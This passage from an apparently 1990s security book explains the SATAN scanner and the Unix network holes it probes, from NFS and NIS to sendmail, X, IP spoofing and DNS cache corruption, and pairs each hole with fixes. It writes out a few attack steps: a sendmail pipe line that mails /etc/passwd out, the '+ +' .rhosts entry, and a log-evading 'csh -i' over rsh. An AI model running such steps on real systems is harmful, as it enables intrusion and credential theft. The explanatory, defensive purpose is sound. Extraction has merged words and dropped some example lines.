A hacker who finds this hole has access to the file system to the level specified by NFS. If rootaccess is exported, the hacker has complete control. If non-root read/write access is exported,the hacker has access to all non-root files. A simple .rhosts file in any user’s home directoryoffers the hacker login access. If the hacker has only read access, damage is still likely. The

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hacker can get passwd files, NIS domain names, system files, NIS maps, and configurationinformation; this information can quickly permit a hacker to discover vulnerabilities that willlead to a login.

Another bug in older versions of NFS permitted remote users with a uid of 2^16 to masquer-ade as root. The NFS check for uid permissions occurred on the 32-bit value passed in theNFS rpc call, which was non-zero, and the system masked this to 16 bits for normal fileoperations.

The use of netgroups has been the source of many security vulnerabilities. The NIS netgroupsfile treats empty host fields as wild cards, permitting any host to gain access from the mountd.

Avoid exporting NFS files systems with write permission, especially when root permission isgranted. Explicitly list client hosts and netgroups instead of permitting any host to gain access.Carefully review the netgroup’s man page to ensure the correct format for entries.

NIS Passwd FilesMany NIS servers do not have access control. Any client that is able to provide a domain namecan bind to the server. Once bound, the client system can request any of the NIS maps, includingthe passwd map, hosts map, and aliases map. The only protection for these maps is the secrecyof the domain name. Because domain names are usually descriptive and simple, they canfrequently be guessed. However, if the remote system runs a bootparam service from the portmapprogram, an rpc call to this service returns the domain name.

SATAN interrogates the bootparam services, gets the domain name, and gets the passwd map.After an intruder has this map, a Crack program can attempt to guess the passwords.

NIS servers should not be accessible to users on the other side of the firewall—the averageInternet user. They should always be used behind (and not on) firewalls that filter out trafficon port 111 (portmap).

Portmap ForwardingA feature of some portmapper daemons is the capability to forward an rpc call to the mountdprogram. Because mountd authenticates the client rpc call based on the source IP address, arequest originating from the portmap program would appear to originate from the localsystem. A remote user on an unauthorized client host could use this forwarding feature tobypass IP access restrictions in the exports file. As long as the local system was permitted togain access to itself, the mountd would reply with the file handle for the NFS mount. Oncethe hacker obtained the file handle, the subsequent NFS rpc calls would be approved becauseno further IP authentication is done by the nfsd or nfs routines in the kernel.

A new portmap program (and rpcbind) prevents such forwarding, and this fix has beenadopted by most vendors. Get the new version of portmap to ensure that your system is notvulnerable to this attack.

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Note More details on this vulnerability are available from CERT bulletin CA-94:15, NFSVulnerabilities. A fixed version of portmap and rpcbind is referenced in thisdocument.

SATAN attempts to get the portmap program to forward a request to the mountd to mountthe exported file systems. This and all the other NFS checks done by SATAN are generated inthe nfs-chk/nfs-chk.c program. The code is well commented and demonstrates how this attackcould be exploited by a hacker.

tftp File AccessMany tftpd implementations do no authentication on incoming requests. Because inetd (withinetd.sec, tcp-wrapper, or xinetd) can do authentication, tftpd should be started only frominetd and should exit after servicing one request. tftpd should be restricted to dealing with alimited directory subtree containing only necessary files.

A hacker with access to a tftpd that permits access to / can enter a new /etc/passwd, becausetftpd has no authentication and is frequently run as root out of inetd. A hacker with accessonly to the tftp directory can still enter a corrupted version of configuration or boot files. Notethat tftpd does not usually provide a listing facility to show what files exist in the directory.Although this improves security by not offering hackers a list of files to attack, it is not enough.Based on knowledge about the OS, the names of boot files and configuration files are typicallyquite similar. The hacker can sequence through guesses based on the OS and usually find acorrect filename.

Remote Shell Accessrshd (remshd) and rlogind are services that permit access based on trust. Trust is determined bya match between the hostname and login name sent by the remote system in the initial packet,and the presence of that hostname and login name, or wild cards, in the local .rhosts orhosts.equiv file.

One analogy to this situation, which might illustrate the weaknesses, is if you are a bankmanager and you tell your tellers to trust anyone named Bob calling from Cleveland.

The presence of wild cards make this situation even more dangerous. The typical entry in.rhosts or hosts.equiv is a hostname followed by a username, such as systemA userB. Thewildcard entry systemA + permits any user from systemA to gain access. The wild cardentry + + permits any user from any machine to gain entry.

The analogy to this situation is that you tell your tellers to trust anyone who claims to becalling from Cleveland, or anyone who calls at all.

The presence of + + in the /.rhosts file is almost always an indicator that a hacker has gainedaccess to your system. This addition to /.rhosts is the primary goal of most attack scripts.

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The first improvement to rshd (remshd) and rlogind to deal with improving trust-basedsecurity was the reverse name lookup using the DNS resolver. The IP address of the source ofthe TCP connection is used to do a gethostbyaddr() call that returns the fully qualified domainname of the host that owns that IP address. If the hostname matches the hostname sent by theinitial protocol, access is permitted.

This is comparable to requiring each teller to call the Cleveland phone company and ask themto trace the phone number of the incoming phone call, then looking up the owner of thatphone number. If the owner’s name matches the name claimed by the caller, access is ap-proved.

This improvement does not solve the problem completely. If the resolver lookup for thehostname contacts a caching name server, the name server could have cached a faked PTRentry that points to the intruder’s name server. If the intruder has control over a legal nameserver that is delegated authority over a network by the Internic, the intruder can easily modifythe name server database to facilitate this attack, without having to corrupt the cache of othername servers (Bellovin, 1993; Schuba & Spafford, 1993).

Note The ftpd server bounce problem mentioned in an earlier section cannot be used toexploit the TCP port number sent in the opening of the rshd (remshd) protocol. It istrue that the start of the rshd protocol permits the client to specify a TCP portnumber for remote errors (stderr) to be sent to; however, the TCP port is only on theclient system. Any hacker who wanted to send a potentially untraceable packet, byspecifying a reserved port number such as smtp or FTP, would first require rootaccess to the system to be able to send the initial rsh (remsh) protocol, because theymust originate from a reserved port and such ports can be obtained only by a rootuser. The hacker would need to be root on the client system to use this attack, andif the hacker was root, such an attack would not be necessary.

System accounts such as bin or daemon should not have functional shells. For example, here isa passwd entry for the user adm:


Even though the adm account appears to prevent a login, by having an * in the passwd field(which can sometimes also indicate a shadow passwd entry), a remote user can still log in if an.rhosts file exists in /usr/adm. If the shell indicated /bin/false, a remote user could not gainaccess to this account, even if an .rhosts file existed.

Note that rshd (remshd) does not generate an entry into the utmp/wtmp files when merelyexecuting a remotely requested service. rlogind and telnetd invoke /bin/login, which logsinformation into those auditing files. If the intruder has root access, the audit trails can beedited; however, if the intruder does not have root access, these audit trails can help the systemadministrator track down the hacker. The hacker could invoke rsh to the system and invoke

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csh -i, which would offer the hacker a shell (but no pty/tty) but leave no traces in the utmp/wtmp. By using tcp-wrapper, a system administrator can track such accesses, even though theutmp/wtmp file does not store any information.

Trust-based mechanisms are dangerous. Firewalls should screen out the shell and login ports toprevent Internet users from gaining direct access to these services. Firewall systems shouldnever permit .rhosts or hosts.equiv files to be used. Most rlogind and rshd (remshd) serverspermit command-line options (-l) in inetd.conf to prevent .rhosts or hosts.equiv files frombeing accessed.

SATAN attempts to rsh (remsh) to the target system using a custom C program that directlycalls the rcmd() routine. It first tries as user bin and root. If access is permitted, SATANassumes that rshd (remshd) trusts the world and has a + in the hosts.equiv. SATAN tries theguest user if the remote system is an SGI IRIX system, because SGI ships systems withoutpasswords for the guest user.

rexdThe rexd service enables a remote user to execute a command on the server, similar to rsh orremsh but with the added feature that the local file system of a user is NFS-mounted on theremote system, and local environment variables are exported to that remote system. Theremote system, by default, does no authentication other than confirming that the uid and gidof the client requesting the service exists on the remote system (auth_unix).

The client system uses the on command to invoke the command on the remote rexd server.The on command takes the current uid setting of the invoking user. A hacker can either su to auid that exists on the remote system, such as bin or daemon, or create a custom program thatdoes this automatically. SATAN uses a custom program called rex to do this.

The rexd can be invoked with an -r option to require that the client system be listed inhosts.equiv. rexd is invoked from inetd, so the tcp-wrapper, or inetd.sec file, can be used tofilter out requests based on originating IP addresses. However, both of these security enhance-ments are somewhat weak. rexd should never be available on hosts connected to the Internet.

SATAN checks with the portmap program to see if rexd is available and then uses rex to getthe /etc/motd as proof of access.

sendmailThe sendmail daemon runs on nearly all Unix hosts, listening on the smtp port and offering toenter into an smtp transaction with any remote system. This is a requirement for standarde-mail service. Combining this with the fact that sendmail runs set-uid root on most systems,and the fact that sendmail is made up of thousands of lines of C code, has made sendmail thesource of many security holes. New ones are found quite frequently.

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SATAN looks for older versions of sendmail by examining the output of the initial line fromthe smtp connection. If the version corresponds to one before 8.6.10 (with some correspond-ing vendor-specific version numbers), it reports a vulnerability.

SATAN includes examples of two sendmail holes: mailing to file and mailing to programs.sendmail should not permit remote users to specify a file or a program: these should only be aresult of alias or .forward expansions on the system running sendmail.

For example, old versions of sendmail permitted a remote user to specify a recipient of /home/bkelley/.rhosts. The data portion of the mail message would be appended to this file. If thedata portion contained + +, any remote user could rlogin to the system as bkelley.

For an example of program mailing, recent versions of sendmail permitted a sender to be aprogram: during the smtp transaction, a mail from: ‘|/bin/mail [emailprotected] < /etc/passwd’ combined with a rcpt to: nosuchuser would result in a bounced e-mail message beingsent to the /bin/mail program command. This command would then mail the /etc/passwd fileto bkelley.

The sendmail syslog buffer problem was discussed earlier, as was the “newline in queue file Rlines” attack. Another attack found in 5.6 sendmail involved specifying two users in the rcptto: line, the second user being a program or file. If sendmail queued the file, the second userwould be written to a separate R line in the queue file and never be tested to see if it was aprogram or file.

All the preceding attacks, and many more, have been documented in CERT advisories andvendor patches. However, not all systems are vigilantly patched.

X ServerMany workstations run the X server while permitting unrestricted remote access by usingxhost +. This permits any remote system to gain control over the system, including readinguser keystrokes, reading anything that is sent to the screen, starting or stopping any applica-tion, and taking control over the currently running session.

SATAN uses xhost to make this check. It could use the XOpenDisplay() call to see if theremote display permitted the intruder system, and therefore anyone, to have access. However,SATAN uses the xhost program to do this by first setting the DISPLAY variable to the targetsystem and then running xhost via xhost. If the remotesystem permits access to the intruder system, this command will work.

Instead of using the xhost mechanism, which depends on IP addresses for authentication, the.Xauthority file and magic cookies can be used. A utility program called xauth extracts a magiccookie from the X server. (The magic cookie is created either by xdm or the user at thebeginning of each session.) This magic cookie can be sent to client systems and merged withthe .Xauthority files by using the xauth merge command. Each access by the client systemincludes the magic cookie that the X server uses to authenticate the client request.

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The weakness in this approach is that any packet sniffer that captures the network transmissionof the magic cookie, which takes place without encryption, can use it to gain access. If theclient’s .Xauthority file is readable by an intruder, the intruder can find the magic cookie. Notethat the magic cookie approach now permits user authentication rather than xhost’s meresystem authentication. (Each user has his or her own .Xauthority file containing magic cookiesfor accessible X servers.)

A new CIAC advisory indicates that the randomization scheme used to send the selection ofthe magic cookie may be too predictable, weakening this form of defense. An improvedrandomization algorithm is referenced in the advisory (Fisher, 1995).

Another weakness in X server systems involve xterms. If the xterm has an X resource definitionof xterm*allowSendEvents: True, then the X server can request the xterm to send informationabout events such as keystrokes. This permits a remote intruder to capture the user’s typing.The xterm can dynamically set this option through the xterm’s main options menu.

Note For complete details on X Windows security, see the paper by John Fisher at theCIAC Web site (Fisher, 1995).

In general, if xhost access is permitted, the remote system names should be specified ratherthan +. The .Xauthority mechanism should be used if at all possible.

SATAN ItselfAlthough SATAN can be run from the command line, SATAN was primarily meant to be runinteractively from a Web browser. When run interactively, SATAN runs a simple HTMLserver, perl/, which processes URL requests sent from the Web browser. The HTMLserver listens on a random port and requires a password to permit access to various URLs. Thispassword is a 32-bit md5 hash that is meant to be somewhat random and difficult to guess.

The goal of this design is to prevent unauthorized users from sending requests to the HTMLserver. Because SATAN runs as root, compromising the HTML server could permit a hackerto execute SATAN commands.

Because the SATAN HTML server runs on the same system as the browser, the URL is neversent over a network. However, some Web browsers disclose the SATAN URL when outsideURLs are selected after running SATAN. With version 1.1 and up, SATAN prints a warningwhen a browser includes such behavior.

In general, exit the Web browser after running SATAN and before trying to use the browser toconnect to other Web sites. An alternative is to use only a Web browser that can be configuredto prevent such behavior. Web browsers that permit remote Web sites to gather informationon previous URLs represent a security problem, because they contribute to informationleakage. Recent versions of Mosaic (2.6) do not transmit URL information.

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With version 1.1 and up, SATAN rejects requests that originate on hosts other than the onethat SATAN is running on, based on source IP address. As usual, a hacker might use IPspoofing to circumvent this restriction.

A Modem on a TCP PortSATAN sends a standard modem AT command to each TCP port. If the port replies withOK, it assumes that a modem is connected to that port.

An intruder who finds a modem directly connected to the TCP port of a remote system canuse it to directly dial out. Modems should never be directly connected to a TCP port, andespecially never to TCP ports that are directly connected to the Internet. If a modem isrequired on a TCP port, a tcp-wrapper and/or S/Key authentication should be considered.

Other Network VulnerabilitiesEven though SATAN does not specifically investigate the following issues, they do presentsome significant areas of concern for system security.

PasswordsPassword selection is very important. The primary target of the first phase of a network attack,which is the primary goal of a SATAN scan, is the password file, so that the hacker can runCrack against it. Programs that force users to choose good passwords can help protect logins.These programs can require passwords that are not in a dictionary or that contain a strangeassortment of numbers and non-alphabetic characters.

Tip A paper by Walter Belgers (Belgers, 1991) on choosing passwords is very usefulon this topic. It is available from

Several papers by Gene Spafford are available on this topic, from the COAST Webpage or FTP archive.

It is dangerous for a user to invoke standard telnet, rlogin, or FTP over the Internet. The usertypes a password that is sent without encryption. One must assume that a hacker is packetsniffing and watching for the unencrypted transmission of passwords, as is typical in FTP,telnet, rlogin, and rexec. If a user does type the password over an Internet connection, it isimportant that the user change the password as soon as possible once the user returns to aconnection within the organization’s firewall.

Users should change passwords often and consider using one-time passwords (S/Key, or Opie),ssh, SSL applications, Kerberos (tickets), or smart cards. Using shadow passwords protects userpasswords from Crack attacks. Not putting them into ˜ftp/etc also protects user passwordsfrom Crack attacks.

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Tip ftpd typically uses only the ˜ftp/etc/passwd file for mapping uids to login names, sothat the ls command prints an owner rather than a number. Some versions of ftpd,notably wu-ftpd, permit sublogins, where a user first logs in anonymously, getsplaced into a chrooted environment of ˜ftp, then does a sublogin as that user. Insuch situations, the ˜ftp/etc/passwd password field is used to permit the login. Theadmin should require each user to choose a new password, clip the encryptedversion of that from the /etc/passwd field, put that in the ˜ftp/etc/passwd entry, andthen require the user to select a new and different password for the regular account.If sublogins are not used, an * can be put into the password field of the ˜ftp/etc/passwd file.

As an administrator, there is one way to deal with protecting the NIS passwd map: run NISonly behind a firewall. The NIS server sends a passwd map in response to any request with theappropriate domain name. Guessing the domain name can be done, and programs like ypx canhelp to send maps.

Secure RPC and NIS+ can help to hide the password map, but the encryption strength hasbeen questioned. Export restrictions may prevent non-U.S. users from getting programs usingDES encryption. Finally, the administration of a system using Secure RPC or NIS+ is fre-quently considered more difficult than regular NIS.

There are at least four ways to deal with protecting /etc/passwd:

■ Shadow password files

■ Password selection enforcers

■ One-time passwords

■ Electronic smart cards

Shadow password files store the encrypted password in a file that is accessible only to root; theregular /etc/passwd file is world-readable. Combining this with a restriction on where root canlog in can make getting a copy of the encrypted passwords difficult.

Note On some Linux systems and HP-UX, the /etc/securetty lists those ttys that can beused to log in as root. Only ttys that are physically under control, such as console,or terminals connected to the serial ports, such as tty00 or tty01, should be listed.For Sun and other systems, the /etc/ttytab file lists all ttys. Adding the word secure tothe option list at the end of an entry permits the entry, such as console, to be asource for a root login. For other systems, /etc/login.defs or /etc/default/login file canbe used to do this. Study the login man page to find out details on your system.

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Password-selection enforcement programs basically replace the standard Unix passwd programwith a version that tries to guess the proposed new password. Essentially, these programs runsomething like Crack against the proposed new password before accepting it.

One-time passwords, using programs such as S/Key or Opie, require users to type a newpassword at each login. Each user has a paper (or online) printout of passwords and is requiredto generate new lists occasionally. Although this appears to be quite safe, an attack against thepredictability of the sequencing is the greatest threat, though the security of a printed (oronline) copy of the passwords is really the greater source of problems.

Another approach is to use smart cards, such as the SecurID from Security Dynamics, thatrequire a PIN number to be typed in and then send a password. This seems to offer safetycomparable to one-time passwords, without the threat of a printed list of passwords.

If the target system has an X Windows vulnerability, the intruder can gain access to all typedkeystrokes, effectively canceling many of the preceding password security approaches.

It is important that non-user accounts in /etc/passwd, such as tftp or bin, have an * in thepassword field and reference /bin/false as the shell. This prevents hackers from gaining accessto these accounts.

ttysEach xterm, telnetd, or rlogind invokes a pty/tty to interact with the user. The applicationopens a pseudo-tty, or pty, which acts as the master and is associated with a slave tty. Theapplication then typically invokes a shell (xterm) or /bin/login (telnetd, rlogind) that invokesa shell.

When the user types on the keyboard, the keystrokes are sent to the pty. If the user is typingon a remote network connection, using rlogin or telnet, the rlogind or telnetd writes thekeystrokes to the master pty.

The pty is described by a device file, such as /dev/pty/ttys2. The permissions on this file aredetermined by the mesg command. For example:

% ll ‘pty’crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2% mesgis n% mesg y% ll ‘pty’crw--w--w- 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2% mesg n% ll ‘pty’crw------ 1 bkelley users 17 0x000032 Nov 20 00:51 dev/pty/ttys2%

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The mesg command enables the user to permit other users to invoke the talk or write com-mand to send messages or interactively talk to this user. A remote user can indicate [emailprotected] and send messages to that user if mesg y has been set by root

The problem is that it is possible to cause commands to be executed on ptys. For example, byechoing commands directly onto the pty device and embedding termcap sequences to invokethose commands, a user can cause commands to be executed by the owner of that pty device. Ifthat owner is root, the user can gain access to root using this technique.

In general, users should be wary of leaving a pty world-writeable. The global /etc/profile (or/etc/cshrc) should use a default of mesg n so that users are required to specifically indicate thisservice.

Rwall (an rpc service available through portmap) and the talk network service (517/UDP,518/UDP) permit a remote user to send messages to many remote systems, but these com-mands merely print to the screen. Unless the termcap capabilities of the remote terms permitthe ability to embed execution strings, there is no way to gain access remotely.

RIP UpdatesA Unix system can maintain routing tables, either for optimized local routing or to act as arouter, by running the gated program. gated can support many routing protocols, fromDVMRP to OSPF, but most gated implementations use RIP, which is also supported by manyhardware routers. If the gated program does not filter routing updates by source address, ahacker can modify the routing tables on the target system. This could lead to disruption ofservice and facilitate other attacks.

In gated versions 1.x, the gated.conf file can be modified to listen only to certain sources forrouting information by adding a line such as this:

trustedripgateways gateway [ gateway ] ... trustedhellogateways gateway [ gateway ]

Only the routing updates from the indicated RIP or HELLO gateways are recognized as valid.

In gated versions 2.x and 3.x, the gated.conf file can include a trustedgateways clause to specifythe same access controls for RIP, HELLO, and ICMP redirects.

RIP-2 packets can use a password authentication. The password consists of a quoted string, 0to 16 bytes long. OSPF can also use an authentication key, which consists of 1 to 8 octets. Ahacker with a packet sniffer could gain access to these passwords and spoof a routing packet.

EGP and BGP require explicit listings of peers in the configuration file. Once again, IPspoofing by a hacker could be used to insert false routing updates.

gated broadcasts RIP routes that could provide a hacker with routing information even if thehacker is unable to make modifications to the system.

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DNS SearchlistsBy default, a hostname lookup using the DNS resolver proceeds by appending the currentdomain to the hostname and attempting a lookup. On failure, the resolver removes theleftmost part of the current domain and retries.

RFC 1535 discusses vulnerabilities to this algorithm. Here is an example that illustrates thevulnerability:

% head -1 /etc/resolv.confdomain nslookup inv.mftg.notreal

At this point, the resolver first tries to look up this line:

This fails. Next, the resolver tries this:

This also fails. At this point, the resolver sees that only two parts remain to the domain part,and it quits, causing the nslookup to fail.

A hacker within the NotReal company could apply for the domain, perhapsclaiming that the domain oversaw the communications department. If the hacker owned thename server for this domain, the hacker could respond to the second resolver request. At thispoint, the hacker could start feeding false information to the resolver, perhaps permitting trust-based attacks using .rhosts to succeed.

The appropriate way to solve this problem is by explicitly listing a search list in the resolv.conffile to specify the exact domain search algorithm.

Investigating IP SpoofingAlthough SATAN does not specifically investigate IP spoofing, its scans for vulnerabilitiesinvolving remote shell access and other services that can be exploited using IP spoofing as thenext logical step.

OverviewThe Internet is based on version 4 of IP. This version of IP does not include any provision forsource authentication. If a version 4 IP packet arrives at a network destination, the upper layersof the network stack must be invoked to perform authentication.

Many applications are designed to trust a packet based on the IP address of the sender. Theseapplications believe that if the packet was able to route itself to this destination, and replypackets are able to route themselves back to the source, the IP address of the source must be

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valid. (This is assuming that IP source routing is turned off.) These applications, if using TCPabove IP, further believe that if the remote sender is able to continue a conversation on theTCP level, the connection is valid. Both of these assumptions are dangerous.

Exploiting ItIn early 1995, CERT released an advisory on IP spoofing that addressed the following twoproblems:

■ Routers were permitting spoofed IP packets to cross over firewalls.

■ Spoofed IP packets were exploiting rshd/remshd by predicting TCP sequence numbers.

The first problem was caused by router misconfigurations. A router that connects an internalnetwork to the Internet has at least two network ports. Imagine a router that had four ports,one of which is connected to the Internet. If a packet arrives from an internal IP address and isdestined for another internal IP address, the router sends it to the correct destination port. Ifthe packet arrives from the Internet, source restrictions prevent it from going to the internalnetwork. For example, the firewall does not allow an external user to invoke the rsh/remshservice on an internal system by screening all requests to the shell TCP port originating froman external address.

Some routers, however, did not keep information on the port source of the IP packet. All theIP packets from all the ports were loaded into a single queue and then processed. If the packetindicated an IP source address from an internal network, that packet was approved forforwarding. Therefore, an external user just had to indicate an internal IP address to send thepacket across the router.

By itself, this problem might be perceived to lead only to single packet attacks. The intruderwould find it difficult to carry on a TCP connection because the internal host would besending reply TCP packets to the internal address specified by the intruder’s fake packet. Theintruder would not be able to acknowledge these packets because the intruder would not knowwhat sequence number was in the packet.

This is when the second problem added to the vulnerability. The intruder used a TCP-oriented service, such as FTP, that was permitted to cross the router. The intruder connectedto the target system and then disconnected. The hacker used the knowledge of the TCPsequencing algorithm to predict the sequence number of the packet that would be sent inresponse to the subsequent incoming TCP connection request. The hacker then sent theappropriate TCP connection request to the login or shell port. At this point, the target systemresponded to the SYN packet with a SYN ACK packet that was sent to the real internal hostcorresponding to the address the intruder indicated. The external system, however, has floodedthis internal host with initialization packets, causing its response time to slow down drastically.As a result, this internal host does not send a RST but instead disregards the packet, and theexternal hacker blindly sent an ACK with the predicted sequence number to the target system.

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The target system assumed that the ACK that arrived originated from the internal host becauseit carried the correct ACK number and IP address. At this point, the intruder could send thenormal data packets for the login or shell protocol, beginning attacks on these services.

Any service that relies on IP authentication is vulnerable to the attack described here. How-ever, other attacks that exploit IP address authentication are also possible.

The rlogind and remshd servers approve access based on a hostname that is sent in theprotocol. This hostname, which should match an entry in .rhosts or /etc/hosts.equiv, isspecified by the client. Until a few years ago, no additional verification was made by theservers. Now, most servers take the IP address of the incoming connection and do a reverselookup using the resolver getnamebyaddr() call.

This call attempts to contact the DNS server and find the name corresponding to the IPaddress. If these match, access is granted. If the DNS server exists outside the administrativedomain of the user, verification of the identity of the client is not certain. The DNS servercould have a contaminated cache containing faulty PTR records that point to the hacker’s ownname server. The DNS server could be administered by the hacker and therefore provideuntrusted information.

The ftpd server bounce problem, discussed earlier, also permits users to hide the true IP sourceof the connection by actually using the IP address of the system running the ftpd for the sourceof TCP connection. This vulnerability simplifies routing problems for the hacker.

If the intermediate systems between the hacker and the target system permit source routing,fake IP addresses are even easier to implement. The intruder can specify the route in theoptions field of the IP packet.

inetd, tcp-wrapper, and xinetd all approve access for services by examining the IP address ofthe incoming request and comparing it to an access list. The secure portmap and rpcbindprograms also defer authorization to IP addresses. The rpc.mountd program uses the IPaddress to control access to file handles if an exported file system specifies a limited access list.

The list of network services that depend on IP addresses for some sort of authorization is quitelarge. When the fact that IP spoofing is possible is combined with the list of available services,the number of network vulnerabilities becomes large.

Note For a more detailed look at IP spoofing, see Chapter 6.

ProtectionSome sort of encrypted authentication scheme would provide the best form of protection tothis vulnerability. However, this is not possible within the framework of the IP level.

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For the router TCP connection attack, the only protection from permitting an unauthorizednew TCP connection as indicated earlier is randomization of the sequencing numbers betweensubsequent TCP connections. This prevents the hacker from guessing the sequence number ofthe SYN ACK packet and responding with an ACK. It does not completely eliminate thepossibility that the hacker could guess the sequence number, because the value has a 32-bitrange; however, it makes it much more difficult.

A paper by Bellovin (Bellovin, 1993) discusses the exact details of the randomization schemes.This does not provide protection over hijacked connections. If an intruder is able to monitorconnections, that intruder could insert packets. Imagine that a user used telnet to connect tothe system. Even if the telnet used some sort of encrypted authentication withKerberos, if the data connection took place without encryption, the intruder could insertpackets into the data stream, effectively capturing control of the user’s keyboard. Only packet-level authentication could avoid this problem.

The other solution is higher-layer authentication, using some sort of security environmentsuch as Kerberos, SSL, or ssh. These protocols do not rely on the IP address for sourceauthentication.

The ftpd server bounce problem is fixed in vendor patches or by getting the latest wu-ftpdprogram. All Unix kernels can be modified to reject source routed packets. The kernels canalso be modified to prevent the automatic forwarding of IP packets that arrive at the networkport but are destined for other systems. Such packets are effectively trying to use the system asa router.

Another IP problem exists with regard to fragmented packets whose fragmentation boundarieslie within TCP packet headers. RFC 1858 addresses ways to deal with vulnerabilities thatrelate to this problem.

A Long-Term SolutionThe newest standard for IP, version 6, includes support for packet-level authentication.Unfortunately, the Internet has yet to offer the infrastructure to support version 6 applications.Broad support from router manufacturers and Unix kernel vendors is required before applica-tions using v6 will become available and popular. In the opinion of this author, end users willnot be able to consider IP v6 applications as a viable solution for security issues until about theyear 2001 (five years from this writing).

Examining Structural Internet ProblemsUnfortunately, some Internet vulnerabilities are quite difficult to fix: they involve a fundamen-tal change in the way the Internet operates, requiring modifications that could be unacceptableto the expected functionality of Internet applications.

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DNS Cache CorruptionThe problems with DNS are inherent in the design of a distributed database: by delegatingresponsibility to remote sites, the integrity of the information on those remote sites is uncer-tain. Added to this problem is the need for caching to improve the performance of thedistributed database.

As indicated in previous sections, the cache of a name server can be corrupted to includeerroneous resource records, such as fake PTR entries. Such cache corruption can be used toattack rlogind and rshd/remshd. SATAN does a scan for remote shell services: DNS cachecorruption is one of the primary ways used to exploit this problem.

The cache corruption can take place by adding extra resource records to replies destined for aname server. A paper by C. Schuba and E. Spafford (Schuba & Spafford, 1993) shows how ahacker can cause the name server to request a reply, which can contain the additional resourcerecords. The paper calls this the “Me Too” attack. Another paper by Bellovin (Bellovin, 1993)also addresses this topic. If SATAN would implement the fourth level of scan, “All Out,” it ishighly likely that a DNS cache corruption attack would be included.

The protection against this attack would be to turn off caching on name servers. However,the resulting performance drop on the DNS infrastructure would virtually eliminate itsusefulness—a major setback to the performance and usefulness of the Internet.

The proper approach to solving this problem is to use some sort of cryptographic authentica-tion, although this too would create a performance drop.

SniffersA packet sniffer is a program that runs on a system and captures every network packet thattravels past the network interface, even if it is not destined for this system or originated on thissystem.

Packet sniffers can easily be installed on most Unix systems to watch traffic crossing thenetwork interface. Recent sniffer attacks on the Internet have resulted in the disclosure ofhundreds of thousands of passwords, because many network protocols transmit the passwordsin clear text.

Weak EncryptionAlthough SATAN does not specifically investigate this problem, SATAN does search for thepresence of https (tcp/443), which is an SSL version of http. Once the presence of thisapplication is known, packet sniffing can record packets destined for this port. These packetstypically contain important financial information (credit card numbers) and may be weaklyencrypted. SATAN is useful for a hacker whose goal is to locate active https ports on theInternet.

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The assumption that the strength of a cryptographic algorithm is directly related to the key sizeis not always accurate. All cryptographic schemes use some sort of session key that is generatedbased on a random number seed. No computer algorithm can easily generate a truly randomnumber. Predictability of the random number seed can decrease the effective bit size of sessionkeys.

A recent Netscape browser ran into this problem. Netscape depends on SSL and permits up toa 128-bit session key to be used for encryption. The session key is generated by the client, inthis case a Netscape browser running on an MS Windows PC, and sent to the server, in thiscase a Unix httpd. The PC offers limited facilities for generating a random number: the clockoffers marginal granularity, and other variables provide little additional randomization. Theresult was that the randomness of the seed provided perhaps 16 to 32 bits of variability for thegeneration of the session key. Such a limited key space could be quickly searched, resulting inkey disclosures in minutes rather than years, as had been assumed.

RFC 1750 addresses the security considerations of randomization and provides recommenda-tions to the producers of cryptographic algorithms.

It is important to clearly examine the true key size of an algorithm. For example, althoughsome U.S. government agencies claim that DES uses a 64-bit key, the eighth bit of every 8bytes is masked inside the algorithm, making the effective key size only 56 bits. One mightwonder about the effective key size of the skipjack algorithm, used in the Clipper chip and notreleased to the public: the same government agencies that make the 64-bit claim for DES alsomake an 80-bit claim for skipjack.

Binary IntegrityIt is important to verify the integrity of any binary program that you run on your system. Thebinary program could be corrupted on the remote system with some sort of virus, or the binarycould be modified during the file transfer to your system.

Source IntegrityMany FTP archives provide precompiled binary versions of application programs. Runningthese programs can open your system to attack if trojan code is embedded in the binary.

Even those programs that provide source code might embed some difficult-to-understandsections of code that effectively constitute a virus. Users should closely examine code beforecompiling and running software of undetermined origin.

If the program is shipped on CD-ROMs or tapes, it is unlikely to have such problems.However, if the source comes from a university FTP archive and no PGP signature is available,the potential exists. Even md5 checksums that are distributed with the program are suspect:the hacker could have modified these checksums and inserted them into the README file. APGP signature of each source file, or of a file containing md5 checksums, is the ideal way toverify source integrity.

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Transfer ModificationsA recent attack on programs distributed using FTP used the approach of modifying portions ofthe files as they were transferred over the Internet. A fake TCP packet containing the modifieddata was inserted into the connection by hackers who monitored the connection using packetsniffers. The attack in question was used to modify the Netscape Navigator, a program that isfrequently downloaded using FTP. The modifications decreased the strength of the encryp-tion, permitting users to erroneously assume greater security for the transmission of secretinformation, such as credit card numbers.

Once again, the distributor can generate a PGP signature for each source file. These PGPsignatures should be used to confirm the integrity of any file. Users should request that FTParchives include .asc files containing PGP signatures for all distributions.

Denial of Service AttacksSATAN reveals the presence of active network services such as ftpd, sendmail, or httpd. Theseservices are nearly always accessible to users “cruising” the Internet. As a result, these servicesare open to “denial of service” attacks. It is quite difficult to avoid denial of service attacks. Theprimary goal of such attacks is to slow down the target machine, fill up all available disk space,and spam the mail recipients with vast amounts of useless mail or something similarly annoy-ing. Nothing prevents a user from sending millions of useless e-mail messages, each one smallenough to be accepted. Nothing prevents a remote user from initiating thousands of networkconnections to the remote system. ftpd can limit the amount of disk space available to trans-fers, and sendmail can limit the size of an individual e-mail message, but this won’t stop adetermined attacker. By partitioning the disk to limit the space available to each vulnerableInternet service, the system’s exposure to such attacks is limited.

The best remedy is to use a firewall to limit the exposure of the majority of systems to randomInternet attacks. There is no way to avoid the e-mail attacks, because firewalls still need topermit access from any remote user.

PostScript FilesIt is possible to embed command sequences in PostScript files. When viewing the file, depend-ing on your viewer, the command sequences could be executed. The safest way to viewunknown .ps files is to print them out on a printer. That is the default action indicated in most.mailcap files for MIME interpretation of .ps files. It would be possible to construct a filter toprevent dangerous actions, or to modify the viewer to prevent dangerous actions, but suchtools and modifications are not widely available.

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Rendezvous with SATAN“‘Before we start to struggle out of here,O master,’ I said when I was on my feet,‘I wish you would explain some things to me.’”

—Dante Alighieri, Inferno, Canto XXXIV, lines 100–102

This section describes the SATAN program in great detail, with information on obtainingSATAN, the files that make up SATAN, running SATAN, and extending SATAN to covernew security holes.

Getting SATANThe CD included with this book contains SATAN. It is also available from the following sites:

















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After you have ftped SATAN to your system, use uncompress satan-1.1.1.tar.Z (orcompress -d) and then tar xvf satan-1.1.1.tar to extract all the SATAN files.

At this point, the SATAN directory should look like this:

Changes TODO html/ perllib/ rules/ satan.psMakefile* bin/ include/ reconfig* satan src/README config/ perl/ repent* satan.8

